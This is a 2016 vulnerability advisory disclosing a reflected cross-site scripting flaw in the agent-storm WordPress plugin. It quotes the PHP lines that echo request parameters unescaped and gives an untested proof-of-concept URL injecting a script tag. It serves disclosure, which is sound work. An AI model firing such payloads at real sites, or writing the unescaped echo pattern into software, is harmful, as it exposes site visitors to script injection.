Advisory #: 682
Title: Reflected XSS in wordpress plugin agent-storm v1.1.35
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/agent-storm
Downloads: 2987
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: agent-storm
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./agent-storm/agentstorm_widget_search.php: 50: <input type="text" id="agentstorm-dd-suburbzip" name="as_suburbzip" value="<?php echo $_GET['as_suburbzip']; ?>" /> 57: <input type="text" id="agentstorm-dd-subdivision" name="as_subdivision" value="<?php echo $_GET['as_subdivision']; ?>" /> The variable as_suburbzip appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./agent-storm/agentstorm_widget_search.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/agent-storm/agentstorm_widget_search.php?as_suburbzip="><script>alert(1);</script><"